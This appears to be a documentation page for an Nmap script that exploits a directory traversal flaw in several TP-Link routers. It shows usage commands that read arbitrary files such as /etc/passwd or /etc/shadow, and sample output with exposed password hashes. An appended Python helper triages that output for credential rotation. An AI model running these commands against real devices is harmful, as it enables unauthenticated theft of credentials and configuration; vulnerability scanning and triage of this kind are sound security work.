http-tplink-dir-traversal
Script type:
portrule
Categories:
vuln, exploit
Download: http://nmap.org/svn/scripts/http-tplink-dir-traversal.nse
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.
Advisory:
Other interesting files:
Remote file to download. Default: /etc/passwd
If set it saves the remote file to this location.
Other arguments you might want to use with this script:
Example usage
nmap -p80 --script http-tplink-dir-traversal.nse <target>
nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited remotely and without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
Author: Paulino Calderon <calderon()websec.mx>
License: compiled by VER007 http://www.ver007.com
MAIN - The script checks for vulnerable devices by attempting to read "etc/shadow" and finding the pattern "root:".
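When this check is run across an inventory of routers, the output has to be triaged. The following added example (not part of the Nmap script or the original page) parses script output in the format shown above and classifies each exposed /etc/shadow entry as a password hash, an empty password, or a locked account, and lists accounts that share one hash. The function name triage and the sample output with its placeholder hash are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the script output above; the hash is a placeholder.
SAMPLE = """\
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$PLACEHOLDERHASH0000000/:10933:0:99999:7:::
|   Admin:$1$$PLACEHOLDERHASH0000000/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
"""

def triage(output):
    """Summarise one host's http-tplink-dir-traversal output (hypothetical helper)."""
    state, kinds, by_hash = None, {}, defaultdict(list)
    for raw in output.splitlines():
        # Drop the "|" / "|_" gutter that Nmap puts in front of script output.
        line = re.sub(r"^\|_?\s*", "", raw).strip()
        m = re.match(r"State:\s*(.+)", line)
        if m:
            state = m.group(1)
            continue
        # A shadow entry has nine colon-separated fields; the third is a day count.
        f = line.split(":")
        if len(f) != 9 or not f[2].isdigit():
            continue
        user, pw = f[0], f[1]
        if pw == "":
            kinds[user] = "empty"      # no password required for this account
        elif pw[0] in "*!":
            kinds[user] = "locked"     # password login disabled
        else:
            kinds[user] = "hash"
            by_hash[pw].append(user)
    reused = [users for users in by_hash.values() if len(users) > 1]
    vulnerable = bool(state and state.startswith("VULNERABLE"))
    return {"vulnerable": vulnerable, "accounts": kinds, "reused": reused}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A host reported as vulnerable with "hash" or "empty" entries should have its credentials treated as disclosed and rotated after the firmware is updated.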